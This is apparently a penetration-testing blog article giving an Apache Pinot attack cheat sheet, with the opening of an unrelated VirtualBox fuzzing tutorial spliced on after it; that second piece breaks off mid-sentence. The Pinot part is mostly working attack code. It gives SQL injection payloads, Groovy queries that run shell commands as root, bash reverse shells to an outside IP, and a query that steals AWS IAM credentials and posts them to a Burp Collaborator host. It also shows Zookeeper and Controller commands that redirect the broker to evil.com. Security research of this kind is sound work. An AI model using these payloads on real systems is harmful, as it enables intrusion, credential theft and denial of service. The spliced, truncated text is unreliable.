Apache Pinot SQLi and RCE Cheat Sheet

The database platform Apache Pinot has been growing in popularity. Let’s attack it!

This article will help pentesters use their familiarity with classic database systems such as Postgres and MariaDB, and apply it to Pinot. In this post, we will show how a classic SQL-injection (SQLi) bug in a Pinot-backed API can be escalated to Remote Code Execution (RCE) and then discuss post-exploitation.

What Is Pinot?

Pinot is a real-time distributed OLAP datastore, purpose-built to provide ultra low-latency analytics, even at extremely high throughput.

Huh? If it helps, most articles try to explain OLAP (OnLine Analytical Processing) by showing a diagram of your 2D database table turning into a cube, but for our purposes we can ignore all the jargon.

Apache Pinot is a database system which is tuned for analytics queries (Business Intelligence) where:

  • data is being streamed in, and needs to be instantly queryable
  • many users need to perform complicated queries at the same time
  • the queries need to quickly aggregate or filter terabytes of data

Apache Pinot Overview

Pinot was started in 2013 at LinkedIn, where it now

powers some of LinkedIn’s more recognisable experiences such as Who Viewed My Profile, Job, Publisher Analytics, […] Pinot also powers LinkedIn’s internal reporting platform…

Pinot is unlikely to be used for storing a fairly static table of user emails and password hashes. It is more likely to be found ingesting a stream of orders or user actions from Kafka for analysis via an internal dashboard. Takeaway delivery platform UberEats gives all restaurants access to a Pinot-powered dashboard which

enables the owner of a restaurant to get insights from Uber Eats orders regarding customer satisfaction, popular menu items, sales, and service quality analysis. Pinot enables slicing and dicing the raw data in different ways and supports low latency queries…

Essential Architectural Details

Pinot is written in Java.

Table data is partitioned / sharded into Segments, usually split based on timestamp, which can be stored in different places.

Apache Pinot is a cluster formed of different components, the essential ones being Controllers, Servers and Brokers.

Server

The Server stores segments of data. It receives SQL queries via GRPC, executes them and returns the results.

Broker

The Broker has an exposed HTTP port which clients send queries to. The Broker analyses the query and queries the Servers which have the required segments of data via GRPC. The client receives the results consolidated into a single response.

Controller

Maintains cluster metadata and manages other components. It serves admin endpoints and endpoints for uploading data.

Zookeeper

Apache Zookeeper is used to store cluster state and metadata. There may be multiple brokers, servers and controllers (LinkedIn claims to have more than 1000 nodes in a cluster), so Zookeeper is used to keep track of these nodes and which servers host which segments. Essentially it’s a hierarchical key-value store.

Setting Up a Test Environment

Following the Kubernetes quickstart in Minikube is an easy way to create a multi-node environment. The documentation walks through the steps to install the Pinot Helm chart, set up ingestion via Kafka, and expose port 9000 of the Controller to access the query editor and cluster management UI. If things break horrifically, you can just minikube delete to wipe everything and start again.

The only recommendations are to:

  • Set image.tag in kubernetes/helm/pinot/values.yaml to a specific Pinot release (e.g. release-0.10.0) rather than latest to test a specific version.
  • Install the Pinot chart from ./kubernetes/helm/pinot to use your local configuration changes rather than pinot/pinot which fetches values from the Github master branch.
  • Use stern -n pinot-quickstart pinot to tail logs from all nodes.

Pinot SQL Syntax & Injection Basics

While Pinot syntax is based on Apache Calcite, many features in the Calcite reference are unsupported in Pinot. Here are some useful language features which may help to identify and test a Pinot backend.

Strings

Strings are surrounded by single-quotes. Single-quotes can be escaped with another single-quote. Double quotes denote identifiers e.g. column names.

String concatenation

Performed by the 3-parameter function CONCAT(str1, str2, separator). The + sign only works with numbers.

SELECT "someColumn", 'a ''string'' with quotes', CONCAT('abc','efg','d') FROM myTable

Substrings

SUBSTR(col, startIndex, endIndex) where indexes start at 0 and can be negative to count from the end. This is different from Postgres and MySQL where the last parameter is a length.

SELECT SUBSTR('abcdef', -3, -1) FROM ignoreMe -- 'def'

Length

LENGTH(str)

Comments

Line comments -- do not require surrounding whitespace. Multiline comments /* */ raise an error if the closing */ is missing.

Filters

Basic WHERE filters need to reference a column. Filters which do not operate on any column will raise errors, so SQLi payloads such as ' OR ''=' will fail:

SELECT * FROM airlineStatsAvro
WHERE 1 = 1
-- QueryExecutionError:
-- java.lang.NullPointerException: ColumnMetadata for 1 should not be null.
-- Potentially invalid column name specified.
SELECT * FROM airlineStatsAvro
WHERE year(NOW()) > 0
-- QueryExecutionError:
-- java.lang.NullPointerException: ColumnMetadata for 2022 should not be null.
-- Potentially invalid column name specified.

As long as you know a valid column name, you can still return all records e.g.:

SELECT * FROM airlineStatsAvro
WHERE 0 = Year - Year AND ArrTimeBlk != 'blahblah-bc'

BETWEEN

SELECT * FROM transcript WHERE studentID between 201 and 300

IN

Use col IN (literal1, literal2, ...).

SELECT * FROM transcript WHERE UPPER(firstName) IN ('NICK','LUCY')

String Matching

In LIKE filters, % and _ are converted to regular expression patterns .* and .

The REGEXP_LIKE(col, regex) function uses a java.util.regex.Pattern case-insensitive regular expression.

WHERE REGEXP_LIKE(alphabet, '^a[Bcd]+.*z$')

Both methods are vulnerable to Denial of Service (DoS) if users can provide their own unsanitised search queries e.g.:

  • LIKE '%%%%%%%%%%%%%zz'
  • REGEXP_LIKE(col, '((((((.*)*)*)*)*)*)*zz')

These filters will run on the Pinot server at close to 100% CPU forever (OK, for a very very long time depending on the data in the column).

UNION

No.

Stacked / Batched Queries

Nope.

JOIN

Limited support for joins is in development. Currently it is possible to join with offline tables with the lookUp function.

Subqueries

Limited support. The subquery is supposed to return a base64-encoded IdSet. An IdSet is a data structure (compressed bitmap or Bloom filter) where it is very fast to check if an Id belongs in the IdSet. The IN_SUBQUERY (filtered on Broker) or IN_PARTITIONED_SUBQUERY (filtered on Server) functions perform the subquery and then use this IdSet to filter results from the main query.

WHERE IN_SUBQUERY(
  yearID,
  'SELECT ID_SET(yearID) FROM baseballStats WHERE teamID = ''BC'''
  ) = 1

Database Version

It is common to SELECT @@VERSION or SELECT VERSION() when fingerprinting database servers. Pinot lacks this feature. Instead, the presence or absence of functions and other language features must be used to identify a Pinot server version.

Information Schema Tables

No.

Data Types

Some Pinot functions are sensitive to the column types in use (INT, LONG, BYTES, STRING, FLOAT, DOUBLE). The hash functions like SHA512, for instance, will only operate on BYTES columns and not STRING columns. Luckily, we can find the undocumented toUtf8 function in the source code and convert strings into bytes:

SELECT md5(toUtf8(somestring)) FROM table

CASE

Simple case:

SELECT
  CASE firstName WHEN 'Lucy' THEN 1 WHEN 'Bob', 'Nick' THEN 2 ELSE 'x' END
FROM transcript

Searched case:

SELECT
  CASE WHEN firstName = 'Lucy' THEN 1 WHEN firstName = 'Bob' THEN 2.1 ELSE 'x' END
FROM transcript

Query Options

Certain query options such as timeouts can be added with OPTION(key=value,key2=value2). Strangely enough, this can be added anywhere inside the query, and I mean anywhere!

SELECT studentID, firstOPTION(timeoutMs=1)Name
froOPTION(timeoutMs=1)m tranOPTION(timeoutMs=2)script
WHERE firstName OPTION(timeoutMs=1000) = 'Lucy'
-- succeeds as the final timeoutMs is long (1000ms)

SELECT * FROM transcript WHERE REGEXP_LIKE(firstName, 'LuOPTION(timeoutMs=1)cy')
-- BrokerTimeoutError:
-- Query timed out (time spent: 4ms, timeout: 1ms) for table: transcript_OFFLINE before scattering the request
--
-- With timeout 10ms, the error is:
-- 427: 1 servers [pinot-server-0_O] not responded
--
-- With an even larger timeout value the query succeeds and returns results for 'Lucy'.

Yes, even inside strings!

In a Pinot-backed search API, queries for thingumajig and thinguOPTION(a=b)majig should return identical results, assuming the characters ()= are not filtered by the API.

This is also potentially a useful WAF bypass.

They're the same picture meme

CTF-grade SQL injection

In far-fetched scenarios, this could be used to comment out parts of a SQL query, e.g. a route /getFiles?category=)&title=%25oPtIoN( using a prepared statement to produce the SQL:

SELECT * FROM gchqFiles
WHERE
  title LIKE '%oPtIoN('
  and topSecret = false
  and category LIKE ')'

Everything between OPTION( and the next ) is stripped out using regex /option\s*\([^)]+\)/i. The query gets executed as:

SELECT * FROM gchqFiles
WHERE
  title LIKE '%'

allowing access to all the top secret files!

Note that the error OPTION statement requires two parts separated by '=' occurs if there are the wrong number of equals signs inside the OPTION().

Another contrived scenario could result in SQLi and a filter bypass.

SELECT * FROM gchqFiles
WHERE
  REGEXP_LIKE(title, 'oPtIoN(a=b')
  and not topSecret
  and category = ') OR id - id = 0--'

will be processed as

SELECT * FROM gchqFiles
WHERE
  REGEXP_LIKE(title, '
  and not topSecret
  and category = ') OR id - id = 0

Timeouts

Timeouts do not work. While the Broker returns a timeout exception to the client when the query timeout is reached, the Server continues processing the query row by row until completion, however long that takes. There is no way to cancel an in-progress query besides killing the Server process.

SQL Injection in Pinot

To proceed, you’ll need a SQL injection vulnerability like for any type of database backend, where malicious user input can wind up in the query body rather than being sent as parameters with prepared statements.

Pinot backends do not support prepared statements, but the Java client has a PreparedStatement class which escapes single quotes before sending the request to the Broker and can prevent SQLi (except the OPTION() variety).

Injection may appear in a search query such as:

query = """SELECT order_id, order_details_json FROM orders
WHERE store_id IN ({stores})
  AND REGEXP_LIKE(product_name,'{query}')
  AND refunded = false""".format(
    stores=user.stores,
    query=request.query,
)

The query parameter can be abused for SQL injection to return all orders in the system without the restriction to specific store IDs. An example payload is !xyz') OR store_id - store_id = 0 OR (product_name = 'abc! which will produce the following SQL query:

SELECT order_id, order_details_json FROM orders
WHERE store_id IN (12, 34, 56)
  AND REGEXP_LIKE(product_name,'!xyz') OR store_id - store_id = 0 OR (product_name = 'abc!')
  AND refunded = false

The logical split happens on the OR, so records will be returned if either:

  • store_id IN (12, 34, 56) AND REGEXP_LIKE(product_name,'!xyz') (unlikely to have any results)
  • store_id - store_id = 0 (always true, so all records are returned)
  • (product_name = 'abc!') AND refunded = false (unlikely to have any results)

If the query template used by the target has no new lines, the query can alternatively be ended with a line comment !xyz') OR store_id - store_id = 0--.

RCE via Groovy

While maturity is bringing improvements, secure design has not always been a priority. Pinot trusts anyone who can query the database to also execute code on the Server, as root 😲. This feature gaping security hole is enabled by default in all released versions of Apache Pinot. It was disabled by default in a commit on May 17, 2022 but this commit has not yet made it into a release.

Scripts are written in the Groovy language. This is a JVM-based language, allowing you to use all your favourite Java methods. Here’s some Groovy syntax you might care about:

// print to Server log (only going to be useful when testing locally)
println 3
// make a variable
def data = 'abc'
// interpolation by using double quotes and $ARG or ${ARG}
def moredata = "${data}def"  // abcdef
// execute shell command, wait for completion and then return stdout
'whoami'.execute().text
// launch shell command, but do not wait for completion
"touch /tmp/$arg0".execute()
// execute shell command with array syntax, helps avoid quote-escaping hell
["bash", "-c", "bash -i >& /dev/tcp/192.168.0.4/53 0>&1 &"].execute()
// a semicolon must be placed after the final closing bracket of an if-else block
if (true) { a() } else { b() }; return "a"

To execute Groovy, use:

GROOVY(
  '{"returnType":"INT or STRING or some other data type","isSingleValue":true}',
  'groovy code on one line',
  MaybeAColumnName,
  MaybeAnotherColumnName
)

If columns (or transform functions) are specified after the groovy code, they appear as variables arg0, arg1, etc. in the Groovy script.

RCE Example Queries

Whoami

SELECT * FROM myTable WHERE groovy(
  '{"returnType":"INT","isSingleValue":true}',
  'println "whoami".execute().text; return 1'
) = 1 limit 5

Prints root to the log! The official Pinot docker images run Groovy scripts as root.

Note that:

  1. The Groovy function is an exception to the earlier rule requiring filters to include a column name.
  2. Even though the limit is 5, every row in each segment being searched is processed. Once 5 rows are reached, the query returns results to the Broker, but the root lines continue being printed to the log.
  3. The return and comparison values need not be the same. However the types must match returnType in the metadata JSON (here INT).
  4. The return keyword is optional for the final statement, so the script could could end with ; 1.
SELECT * FROM myTable WHERE groovy(
  '{"returnType":"INT","isSingleValue":true}',
  'println "hello $arg0"; "touch /tmp/id-$arg0".execute(); 42',
  id
) = 3

In /tmp, expect root-owned files id-1, id-2, id-3, etc. for each row.

AWS

Steal temporary AWS IAM credentials from pinot-server.

SELECT * FROM myTable WHERE groovy(
  '{"returnType":"INT","isSingleValue":true}',
  CONCAT(CONCAT(CONCAT(CONCAT(
    'def aws = "169.254.169.254/latest/meta-data/iam/security-credentials/";',
    'def collab = "xyz.burpcollaborator.net/";',
''),'def role = "curl -s ${aws}".execute().text.split("\n")[0].trim();',
''),'def creds = "curl -s ${aws}${role}".execute().text;',
''),'["curl", collab, "--data", creds].execute(); 0',
  '')
) = 1

Could give access to cloud resources like S3. The code can of course be adapted to work with IMDSv2.

Reverse Shell

The goal is really to have a root shell from which to explore the cluster at your leisure without your commands appearing in query logs. You can use the following:

SELECT * FROM myTable WHERE groovy(
  '{"returnType":"INT","isSingleValue":true}',
  '["bash", "-c", "bash -i >& /dev/tcp/192.168.0.4/443 0>&1 &"].execute(); return 1'
) = 1

to spawn loads of reverse shells at the same time, one per row.

root@pinot-server-1:/opt/pinot#

You will be root on whichever Server instances are chosen by the broker based on which Servers contain the required table segments for the query.

SELECT * FROM myTable WHERE groovy(
  '{"returnType":"STRING","isSingleValue":true}',
  '["bash", "-c", "bash -i >& /dev/tcp/192.168.0.4/4444 0>&1 &"].execute().text'
) = 'x'

This launches one reverse shell. If you accidentally kill the shell, however far into the future, a new reverse shell attempt will be spawned as the Server processes the next row. Yes, the client and Broker will see the query timeout, but the Server will continue executing the query until completion.

Tuning

When coming across Pinot for the first time on an engagement, we used a Groovy query similar to the AWS one above. However, as you can already guess, this launched tens of thousands of requests at Burp Collaborator over a span of several hours with no way to stop the runaway query besides confessing our sin to the client.

To avoid spawning thousands of processes and causing performance degradation and potentially a Denial of Service, limit execution to a single row with an if statement in Groovy.

SELECT * FROM myTable WHERE groovy(
  '{"returnType":"INT","isSingleValue":true}',
  CONCAT(CONCAT(CONCAT(CONCAT(
    'if (arg0 == "489") {',
    '["bash", "-c", "bash -i >& /dev/tcp/192.168.0.4/4444 0>&1 &"].execute();',
''),'return 1;',
''),'};',
''),'return 0',
  ''),
  id
) = 1

A reverse shell is spawned only for the one row with id 489.

Use RCE on Server to Attack Other Nodes

We have root access to a Server via our reverse shell, giving us access to:

  • All the segment data stored on the Server
  • Configuration and environment variables with the locations of other services such as Broker and Zookeeper
  • Potentially keys to the cloud environment with juicy IAM permissions

As we’re root here already, let’s try to use our foothold to affect other parts of the Pinot cluster such as Zookeeper, Brokers, Controllers, and other Servers.

First we should check the configuration.

root@pinot-server-1:/opt/pinot# cat /proc/1/cmdline | sed 's/\x00/ /g'
/usr/local/openjdk-11/bin/java -Xms512M ... -Xlog:gc*:file=/opt/pinot/gc-pinot-server.log -Dlog4j2.configurationFile=/opt/pinot/conf/log4j2.xml -Dplugins.dir=/opt/pinot/plugins -Dplugins.dir=/opt/pinot/plugins -classpath /opt/pinot/lib/*:...:/opt/pinot/plugins/pinot-file-system/pinot-s3/pinot-s3-0.10.0-SNAPSHOT-shaded.jar -Dapp.name=pinot-admin -Dapp.pid=1 -Dapp.repo=/opt/pinot/lib -Dapp.home=/opt/pinot -Dbasedir=/opt/pinot org.apache.pinot.tools.admin.PinotAdministrator StartServer -clusterName pinot -zkAddress pinot-zookeeper:2181 -configFileName /var/pinot/server/config/pinot-server.conf

We have a Zookeeper address -zkAddress pinot-zookeeper:2181 and config file location -configFileName /var/pinot/server/config/pinot-server.conf. The file contains data locations and auth tokens in the unlikely event that internal cluster authentication has been enabled.

Zookeeper

It is likely that the locations of other services are available as environment variables, however the source of truth is Zookeeper. Nodes must be able to read and write to Zookeeper to update their status.

root@pinot-server-1:/opt/pinot# cd /tmp
root@pinot-server-1:/tmp# wget -q https://dlcdn.apache.org/zookeeper/zookeeper-3.8.0/apache-zookeeper-3.8.0-bin.tar.gz && tar xzf apache-zookeeper-3.8.0-bin.tar.gz
root@pinot-server-1:/tmp# ./apache-zookeeper-3.8.0-bin/bin/zkCli.sh -server pinot-zookeeper:2181
Connecting to pinot-zookeeper:2181
...
2022-06-06 20:53:52,385 [myid:pinot-zookeeper:2181] - INFO  [main-SendThread(pinot-zookeeper:2181):o.a.z.ClientCnxn$SendThread@1444] - Session establishment complete on server pinot-zookeeper/10.103.140.149:2181, session id = 0x10000046bac0016, negotiated timeout = 30000
...
[zk: pinot-zookeeper:2181(CONNECTED) 0] ls /pinot/CONFIGS/PARTICIPANT
[Broker_pinot-broker-0.pinot-broker-headless.pinot-quickstart.svc.cluster.local_8099, Controller_pinot-controller-0.pinot-controller-headless.pinot-quickstart.svc.cluster.local_9000, Minion_pinot-minion-0.pinot-minion-headless.pinot-quickstart.svc.cluster.local_9514, Server_pinot-server-0.pinot-server-headless.pinot-quickstart.svc.cluster.local_8098, Server_pinot-server-1.pinot-server-headless.pinot-quickstart.svc.cluster.local_8098]

Now we have the list of “participants” in our Pinot cluster. We can get the configuration of a Broker:

[zk: pinot-zookeeper:2181(CONNECTED) 1] get /pinot/CONFIGS/PARTICIPANT/Broker_pinot-broker-0.pinot-broker-headless.pinot-quickstart.svc.cluster.local_8099
{
  "id" : "Broker_pinot-broker-0.pinot-broker-headless.pinot-quickstart.svc.cluster.local_8099",
  "simpleFields" : {
    "HELIX_ENABLED" : "true",
    "HELIX_ENABLED_TIMESTAMP" : "1654547467392",
    "HELIX_HOST" : "pinot-broker-0.pinot-broker-headless.pinot-quickstart.svc.cluster.local",
    "HELIX_PORT" : "8099"
  },
  "mapFields" : { },
  "listFields" : {
    "TAG_LIST" : [ "DefaultTenant_BROKER" ]
  }
}

By modifying the broker HELIX_HOST in Zookeeper (using set), Pinot queries will be sent via HTTP POST to /query/sql on a machine you control rather than the real broker. You can then reply with your own results. While powerful, this is a rather disruptive attack.

In further mitigation, it will not affect services which send requests directly to a hardcoded Broker address. Many clients do rely on Zookeeper or the Controller to locate the broker, and these clients will be affected. We have not investigated whether intra-cluster mutual TLS would downgrade this attack to DoS.

Broker

We discovered the location of the broker. Its HELIX_PORT refers to the an HTTP server used for submitting SQL queries:

curl -H "Content-Type: application/json" -X POST \
   -d '{"sql":"SELECT X FROM Y"}' \
   http://pinot-broker-0:8099/query/sql

Sending queries directly to the broker may be much easier than via the SQLi endpoint. Note that the broker may have basic auth enabled, but as with all Pinot services it is disabled by default.

All Pinot REST services also have an /appconfigs endpoint returning configuration, environment variables and java versions.

Other Servers

There may be data which is only present on other Servers. From your reverse shell, SQL queries can be sent to any other Server via GRPC without requiring authentication.

Alternatively, we can go back and use Pinot’s IdSet subquery functionality to get shells on other Servers. We do this by injecting an IN_SUBQUERY(columnName, subQuery) filter into our original query to tableA to produce SQL like:

SELECT * FROM tableA
  WHERE
    IN_SUBQUERY(
      'x',
      'SELECT ID_SET(firstName) FROM tableB WHERE groovy(''{"returnType":"INT","isSingleValue":true}'',''println "RCE";return 3'', studentID)=3'
    ) = true

It is important that the tableA column name (here the literal 'x') and the ID_SET column of the subquery have the same type. If an integer column from tableB is used instead of firstName, the 'x' must be replaced with an integer.

We now get RCE on the Servers holding segments of tableB.

Controller

The Controller also has a useful REST API.

It has methods for getting and setting data such as cluster configuration, table schemas, instance information and segment data.

It can be used to interact with Zookeeper e.g. to update the broker host like was done directly via Zookeeper above.

curl -X PUT "http://localhost:9000/instances/Broker_pinot-broker-0.pinot-broker-headless.pinot-quickstart.svc.cluster.local_8099?updateBrokerResource=true" -H  "accept: application/json" -H  "Content-Type: application/json" -d "{  \"instanceName\": \"Broker_pinot-broker-0.pinot-broker-headless.pinot-quickstart.svc.cluster.local_8099\",  \"host\": \"evil.com\",  \"enabled\": true,  \"port\": \"8099\",  \"tags\": [\"DefaultTenant_BROKER\"],  \"type\":\"BROKER\",  \"pools\": null,  \"grpcPort\": -1,  \"adminPort\": -1,  \"systemResourceInfo\": null}"

Files can also be uploaded for ingestion into tables.

TLDR

  • Pinot is a modern database platform that can be attacked with old-school SQLi
  • SQL injection leads to Remote Code Execution by default in the latest release, at the time of writing
  • In the official container images, RCE means root on the Server component of the Pinot cluster
  • From here, other components can be affected to a certain degree
  • WTF is going on with OPTION()?
  • Pinot is under active development. Maturity will bring security improvements
  • In an upcoming release (>0.10.0) the SQLi to RCE footgun will be opt-in

Introduction to VirtualBox security research

Introduction

This article introduces VirtualBox research and explains how to build a coverage-based fuzzer, focusing on the emulated network device drivers. In the examples below, we explain how to create a harness for the non-default network device driver PCNet. The example can be readily adjusted for a different network driver or even different device driver components.

We are aware that there are excellent resources related to this topic - see [1], [2]. However, these cover the fuzzing process from a high-level perspective or omit some important technical details. Our goal is to present all the necessary steps and code required to instrument and debug the latest stable version of VirtualBox (6.1.30 at the time of writing). As the SVN version is out-of-sync, we download the tarball instead.

In our setup, we use Ubuntu 20.04.3 LTS. As the VT-x/AMD-V feature is not fully supported for VirtualBox, we use a native host. When using a MacBook, the following guide enables a Linux installation to an external SSD.

VirtualBox uses the kBuild framework for building. As mentioned on their page, only a few (0.5) people on our planet understand it, but editing makefiles should be straightforward. As we will see later, after commenting out hardware-specific components, that’s indeed true.

kmk is a kBuild alternative for the make subsystem. It allows creating debug or release builds, depending on the supplied arguments. The debug build provides a robust logging mechanism, which we will describe next.

Note that in this article, we will use three different builds. The remaining two release builds are for fuzzing and coverage reporting. Because they involve modifying the source code, we use a separate directory for every instance.

Debug Build

The build instructions for Linux are described here. After installing all required dependencies, it’s enough to run the following commands:

$ ./configure --disable-hardening --disable-docs
$ source ./env.sh && kmk KBUILD_TYPE=debug

If successful, the binary VirtualBox from the out/linux.amd64/debug/bin/VirtualBox directory will be created. Before creating our first guest host, we have to compile and load the kernel modules:

$ VERSION=6.1.30
$ vbox_dir=~/VirtualBox-$VERSION-debug/
$ (cd $vbox_dir/out/linux.amd64/debug/bin/src/vboxdrv && sudo make && sudo insmod vboxdrv.ko)
$ (cd $vbox_dir/out/linux.amd64/debug/bin/src/vboxnetflt && sudo make && sudo insmod vboxnetflt.ko)
$ (cd $vbox_dir/out/linux.amd64/debug/bin/src/vboxnetadp && sudo make && sudo insmod vboxnetadp.ko)

VirtualBox defines the VBOXLOGGROUP enum inside include/VBox/log.h, allowing to selectively enable the logging of specific files or functionalities. Unfortunately, since the logging is intended for the debug builds, we could not enable this functionality in the release build without making many cumbersome changes.

Unlike the VirtualBox binary, the VBoxHeadless startup utility located in the same directory allows running the machines directly from the command-line interface. For illustration, we want to enable debugging for both this component and the PCNet network driver. First, we have to identify the entries of the VBOXLOGGROUP. They are defined using the LOG_GROUP_ string near the beginning of the file we wish to trace:

$ grep LOG_GROUP_ src/VBox/Frontends/VBoxHeadless/VBoxHeadless.cpp src/VBox/Devices/Network/DevPCNet.cpp

src/VBox/Frontends/VBoxHeadless/VBoxHeadless.cpp:#define LOG_GROUP LOG_GROUP_GUI
src/VBox/Devices/Network/DevPCNet.cpp:#define LOG_GROUP LOG_GROUP_DEV_PCNET

We redirect the output to the terminal instead of creating log files and specify the Log Group name, using the lowercased string from the grep output and without the prefix:

$ export VBOX_LOG_DEST="nofile stdout"
$ VBOX_LOG="+gui.e.l.f+dev_pcnet.e.l.f.l2" out/linux.amd64/debug/bin/VBoxHeadless -startvm vm-test

The VirtualBox logging facility and the meaning of all parameters are clarified here. The output is easy to grep, and it’s crucial for understanding the internal structures.

AFL instrumentation for afl-clang-fast / afl-clang-fast++

Installing Clang

For Ubuntu, we can follow the official instructions to install the Clang compiler. We used clang-12, because building was not possible with the previous version. Alternatively, clang-13 is supported too. After we are done, it is useful to verify the installation and create symlinks to ensure AFLplusplus will not complain about missing locations:

$ rehash
$ clang --version
$ clang++ --version
$ llvm-config --version
$ llvm-ar --version

$ sudo ln -sf /usr/bin/llvm-config-12 /usr/bin/llvm-config
$ sudo ln -sf /usr/bin/clang++-12 /usr/bin/clang++
$ sudo ln -sf /usr/bin/clang-12 /usr/bin/clang
$ sudo ln -sf /usr/bin/llvm-ar-12 /usr/bin/llvm-ar

Building AFLplusplus (AFL++)

Our fuzzer of choice was AFL++, although everything can be trivially reproduced with libFuzzer too. Since we don’t need the black box instrumentation, it’s enough to include the source-only parts:

$ git clone https://github.com/AFLplusplus/AFLplusplus
$ cd AFLplusplus

# use this revision if the VirtualBox compilation fails
$ git checkout 66ca8618ea3ae1506c96a38ef41b5f04387ab560

$ make source-only
$ sudo make install

Applying patches

To use clang for fuzzing, it’s necessary to create a new template kBuild/tools/AFL.kmk by using the vbox-fuzz/AFL.kmk file, available on https://github.com/doyensec/vbox-fuzz.

Moreover, we have to fix multiple issues related to undefined symbols or different commentary styles. The most important change is disabling the instrumentation for Ring-0 components (TEMPLATE_VBoxR0_TOOL). Otherwise it’s not possible to boot the guest machine. All these changes are included in the patch files.

Interestingly, when I was investigating the error message I obtained during the failed compilation, I found some recent slides from the HITB conference describing exactly the same issue. This was a confirmation that I was on the right track, and more people were trying the same approach. The slides also mention VBoxHeadless, which was a natural choice for a harness, that we used too.

If the unmodified VirtualBox is located inside the ~/VirtualBox-6.1.30-release-afl directory, we run these commands to apply all necessary patches:

$ TO_PATCH=6.1.30
$ SRC_PATCH=6.1.30
$ cd ~/VirtualBox-$TO_PATCH-release-afl

$ patch -p1 < ~/vbox-fuzz/$SRC_PATCH/Config.patch
$ patch -p1 < ~/vbox-fuzz/$SRC_PATCH/undefined_xfree86.patch
$ patch -p1 < ~/vbox-fuzz/$SRC_PATCH/DevVGA-SVGA3d-glLdr.patch
$ patch -p1 < ~/vbox-fuzz/$SRC_PATCH/VBoxDTraceLibCWrappers.patch
$ patch -p1 < ~/vbox-fuzz/$SRC_PATCH/os_Linux_x86_64.patch

Running kmk without KBUILD_TYPE yields instrumented binaries, where the device drivers are bundled inside VBoxDD.so shared object. The output from nm confirms the presence of the instrumentation symbols:

$ nm out/linux.amd64/release/bin/VBoxDD.so | egrep "afl|sancov"
                 U __afl_area_ptr
                 U __afl_coverage_discard
                 U __afl_coverage_off
                 U __afl_coverage_on
                 U __afl_coverage_skip
000000000033e124 d __afl_selective_coverage
0000000000028030 t sancov.module_ctor_trace_pc_guard
000000000033f5a0 d __start___sancov_guards
000000000036f158 d __stop___sancov_guards

Creating Coverage Reports

First, we have to apply the patches for AFL, described in the previous section. After that, we copy the instrumented version and remove the earlier compiled binaries if they are present:

$ VERSION=6.1.30
$ cp -r ~/VirtualBox-$VERSION-release-afl ~/VirtualBox-$VERSION-release-afl-gcov
$ cd ~/VirtualBox-$VERSION-release-afl-gcov
$ rm -rf out

Now we have to edit the kBuild/tools/AFL.kmk template to append -fprofile-instr-generate -fcoverage-mapping switches as follows:

TOOL_AFL_CC  ?= afl-clang-fast$(HOSTSUFF_EXE)   -m64 -fprofile-instr-generate -fcoverage-mapping
TOOL_AFL_CXX ?= afl-clang-fast++$(HOSTSUFF_EXE) -m64 -fprofile-instr-generate -fcoverage-mapping
TOOL_AFL_AS  ?= afl-clang-fast$(HOSTSUFF_EXE)   -m64 -fprofile-instr-generate -fcoverage-mapping
TOOL_AFL_LD  ?= afl-clang-fast++$(HOSTSUFF_EXE) -m64 -fprofile-instr-generate -fcoverage-mapping

To avoid duplication, we share the src and include folders with the fuzzing build:

$ rm -rf ./src
$ rm -rf ./include

$ ln -s ../VirtualBox-$VERSION-release-afl/src $PWD/src
$ ln -s ../VirtualBox-$VERSION-release-afl/include $PWD/include

Lastly, we expand the list of undefined symbols inside src/VBox/Additions/x11/undefined_xfree86 by adding:

ftell
uname
strerror
mkdir
__cxa_atexit
fclose
fileno
fdopen
strrchr
fseek
fopen
ftello
prctl
strtol
getpid
mmap
getpagesize
strdup

Furthermore, because this build is intended for reporting only, we disable all unnecessary features:

$ ./configure --disable-hardening --disable-docs --disable-java --disable-qt
$ source ./env.sh && kmk

The raw profile is generated by setting LLVM_PROFILE_FILE. For more information, the Clang documentation provides the necessary details.

Writing a harness

Getting pVM

At this point, the VirtualBox drivers are fully instrumented, and the only remaining thing left before we start fuzzing is a harness. The PCNet device driver is defined in src/VBox/Devices/Network/DevPCNet.cpp, and it exports several functions. Our output is truncated to include only R3 components, as these are the ones we are targeting:

/**
 * The device registration structure.
 */
const PDMDEVREG g_DevicePCNet =
{
    /* .u32Version = */             PDM_DEVREG_VERSION,
    /* .uReserved0 = */             0,
    /* .szName = */                 "pcnet",
#ifdef PCNET_GC_ENABLED
    /* .fFlags = */                 PDM_DEVREG_FLAGS_DEFAULT_BITS | PDM_DEVREG_FLAGS_RZ | PDM_DEVREG_FLAGS_NEW_STYLE,
#else
    /* .fFlags = */                 PDM_DEVREG_FLAGS_DEFAULT_BITS,
#endif
    /* .fClass = */                 PDM_DEVREG_CLASS_NETWORK,
    /* .cMaxInstances = */          ~0U,
    /* .uSharedVersion = */         42,
    /* .cbInstanceShared = */       sizeof(PCNETSTATE),
    /* .cbInstanceCC = */           sizeof(PCNETSTATECC),
    /* .cbInstanceRC = */           sizeof(PCNETSTATERC),
    /* .cMaxPciDevices = */         1,
    /* .cMaxMsixVectors = */        0,
    /* .pszDescription = */         "AMD PCnet Ethernet controller.\n",
#if defined(IN_RING3)
    /* .pszRCMod = */               "VBoxDDRC.rc",
    /* .pszR0Mod = */               "VBoxDDR0.r0",
    /* .pfnConstruct = */           pcnetR3Construct,
    /* .pfnDestruct = */            pcnetR3Destruct,
    /* .pfnRelocate = */            pcnetR3Relocate,
    /* .pfnMemSetup = */            NULL,
    /* .pfnPowerOn = */             NULL,
    /* .pfnReset = */               pcnetR3Reset,
    /* .pfnSuspend = */             pcnetR3Suspend,
    /* .pfnResume = */              NULL,
    /* .pfnAttach = */              pcnetR3Attach,
    /* .pfnDetach = */              pcnetR3Detach,
    /* .pfnQueryInterface = */      NULL,
    /* .pfnInitComplete = */        NULL,
    /* .pfnPowerOff = */            pcnetR3PowerOff,
    /* .pfnSoftReset = */           NULL,
    /* .pfnReserved0 = */           NULL,
    /* .pfnReserved1 = */           NULL,
    /* .pfnReserved2 = */           NULL,
    /* .pfnReserved3 = */           NULL,
    /* .pfnReserved4 = */           NULL,
    /* .pfnReserved5 = */           NULL,
    /* .pfnReserved6 = */           NULL,
    /* .pfnReserved7 = */           NULL,
#elif defined(IN_RING0)
// [ SNIP ]

The most interesting fields are .pfnReset, which resets the driver’s state, and the .pfnReserved functions. The latter ones are currently not used, but we can add our own functions and call them, by modifying the PDM (Pluggable Device Manager) header files. PDM is an abstract interface used to add new virtual devices relatively easily.

But first, if we want to use the modified VboxHeadless, which provides a high-level interface (VirtualBox Main API) to the VirtualBox functionality, we need to find a way to access the pdm structure.

By reading the source code, we can see multiple patterns where pVM (pointer to a VM handle) is dereferenced to traverse a linked list with all device instances:

